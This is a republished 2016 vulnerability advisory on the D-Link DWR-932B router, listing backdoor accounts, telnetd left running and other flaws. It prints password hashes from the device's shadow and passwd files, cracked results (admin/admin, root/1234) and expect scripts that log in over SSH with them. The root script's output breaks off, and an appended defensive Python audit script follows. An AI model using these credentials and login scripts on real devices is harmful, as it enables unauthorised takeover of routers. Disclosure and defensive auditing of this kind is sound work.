Dlink DWR-932B router found to contain multiple security vulnerabilities - vulnerability warning - the black bar safety net (myhack58)

2016-10-08T00:00:00
ID MYHACK58:62201679928
Type myhack58
Reporter Anonymous
Modified 2016-10-08T00:00:00

Description

Foreword

According to the latest findings of security experts, the Dlink DWR-932B router contains a large number of security vulnerabilities, including backdoors, backdoor accounts, weak WPS, and a remote code execution vulnerability. If you are interested in IoT security, you can pick up this router to practice on.

Vulnerability overview

The Dlink DWR-932B is an LTE router. Its overall design has very serious problems, which leave the device with a large number of security vulnerabilities. Dlink is a multinational network equipment manufacturer, and this router is now sold in countries and regions around the world. Note that this device currently provides Internet access to multinational businesses and organizations, so these vulnerabilities put the businesses that depend on it at risk. According to the security researchers' description, a core functional module of the Dlink DWR-932B router is based on the Quanta LTE router module. Unfortunately, this module inherits not only the Quanta LTE router's communication functionality but also its security vulnerabilities, which it brings along to the Dlink DWR-932B itself.
The security vulnerabilities present in the Dlink DWR-932B router are as follows:

- Backdoor accounts
- Backdoor
- Default WPS PIN code
- Weak WPS PIN code generation
- Leaked No-IP account
- Multiple vulnerabilities in the HTTP daemon qmiweb
- Remote FOTA
- Bad security practices
- UPnP security issues

In the vulnerability analysis and testing that follows, we used the latest official firmware version (firmware DWR-932_fw_revB_2_02_eu_en_20150709.zip, Model Version B, compiler /Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).

The security researchers' view: if you are an optimist, you can assume these vulnerabilities are the result of the manufacturer's negligence; if you are a conspiracy theorist, you can equally assume the manufacturer designed them in deliberately. This article does not disclose every vulnerability that was discovered; it analyzes only some of the more serious ones. Note that this router is still on sale. Since the manufacturer has not yet provided users with a security update, these vulnerabilities remain unfixed. Users with questions about this can try contacting their local D-Link service point.

Vulnerability details analysis - Backdoor accounts

By default, both the telnetd and SSHd services run on the router. Note that even though the router's documentation says nothing about telnetd, the service still runs on the device:

user@kali:~$ cat ./etc/init.d/start_appmgr
[...]
#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
fi
#Sandro }
[...]

The security researchers found two backdoor accounts in this router. An attacker can use these two accounts to bypass the router's HTTP authentication and gain administrative access to the router.

admin@homerouter:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
admin@homerouter:~$

With the help of IDA, the researchers found the router's administrator account in "/bin/appmgr". The device's administrator account is "admin" by default, and the password is also "admin".

Information about the root user is shown below:

user@kali:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:99999:7:::
daemon::16270:0:99999:7:::
bin::16270:0:99999:7:::
sys::16270:0:99999:7:::
sync::16270:0:99999:7:::
games::16270:0:99999:7:::
man::16270:0:99999:7:::
lp::16270:0:99999:7:::
mail::16270:0:99999:7:::
news::16270:0:99999:7:::
uucp::16270:0:99999:7:::
proxy::16270:0:99999:7:::
www-data::16270:0:99999:7:::
backup::16270:0:99999:7:::
list::16270:0:99999:7:::
irc::16270:0:99999:7:::
gnats::16270:0:99999:7:::
diag::16270:0:99999:7:::
nobody::16270:0:99999:7:::
messagebus:!:16270:0:99999:7:::
avahi:!:16270:0:99999:7:::
user@kali:~$

Cracking the obtained password hashes with the hash-cracking tool John the Ripper:

user@kali:~$ john --show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:99999:7:::

2 password hashes cracked, 0 left
user@kali:~$

The results of the analysis are as follows:

- the admin account password is "admin"
- the root account password is "1234"

An alternative expect script that completes the exploit using the admin account (for reference only):

user@kali:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f
set timeout 3
spawn ssh admin@192.168.1.1
expect "password: $"
send "admin\r"
interact
user@kali:~$ ./quanta-ssh-default-password-admin
spawn ssh admin@192.168.1.1
admin@192.168.1.1's password:
admin@homerouter:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
admin@homerouter:~$

An alternative expect script that completes the exploit using the root account (for reference only):

user@kali:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f
set timeout 3
spawn ssh root@192.168.1.1
expect "password: $"
send "1234\r"
interact
user@kali:~$ ./quanta-ssh-default-password-root
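As an added defender-side example (not code from the advisory or from D-Link), the following Python audits an extracted firmware root the way the article reads /etc/passwd, /etc/shadow and start_appmgr: it reports unlocked accounts that have a login shell and whether their hash is traditional DES crypt (the 13-character form John cracked above), and lists remote-shell daemons an init script launches via start-stop-daemon. The sample passwd, shadow and init-script text is constructed from the article's excerpts; the set of remote-shell daemon names and no-login shells is an assumption.

```python
import re

# Constructed sample data modelled on the article's excerpts (hash values copied from it).
PASSWD = """root:x:0:0:root:/:/bin/sh
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
"""
SHADOW = """root:aRDiHrJ0OkehM:16270:0:99999:7:::
daemon::16270:0:99999:7:::
messagebus:!:16270:0:99999:7:::
"""
INIT_SCRIPT = """#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
fi
#Sandro }
"""
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}  # assumed list
REMOTE_SHELL_DAEMONS = {"telnetd", "utelnetd", "sshd", "dropbear"}       # assumed list

def hash_algo(h):
    """Classify a crypt(3) password field by its shape."""
    if h == "":
        return "empty"       # no password needed at all
    if h[0] in "!*":
        return "locked"      # cannot be used for password login
    if h.startswith("$"):
        return {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}.get(h[:3], "other")
    if re.fullmatch(r"[./0-9A-Za-z]{13}", h):
        return "descrypt"    # traditional DES: <=8-char password, 12-bit salt, fast to crack
    return "unknown"

def audit_accounts(passwd_text, shadow_text):
    """Return {user: (algo, shell)} for unlocked accounts with a login shell.
    The hash may sit in passwd itself (as admin's does here) or behind 'x' in shadow."""
    shadow = {l.split(":")[0]: l.split(":")[1] for l in shadow_text.splitlines() if l}
    findings = {}
    for line in filter(None, passwd_text.splitlines()):
        user, pw, _uid, _gid, _gecos, _home, shell = line.split(":")
        algo = hash_algo(shadow.get(user, "!") if pw == "x" else pw)  # no shadow entry = locked
        if shell not in NOLOGIN_SHELLS and algo != "locked":
            findings[user] = (algo, shell)
    return findings

def remote_shell_daemons(script_text):
    """Remote-shell binaries an init script starts via 'start-stop-daemon -S ... -a <path>'."""
    started = re.findall(r"start-stop-daemon\s+-S\b.*?-a\s+(\S+)", script_text)
    return sorted(p for p in started if p.rsplit("/", 1)[-1] in REMOTE_SHELL_DAEMONS)
```

Run against a real unpacked firmware, both functions together flag exactly the exposure the article describes: interactive accounts with crackable DES hashes on a device whose init script brings up telnetd.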
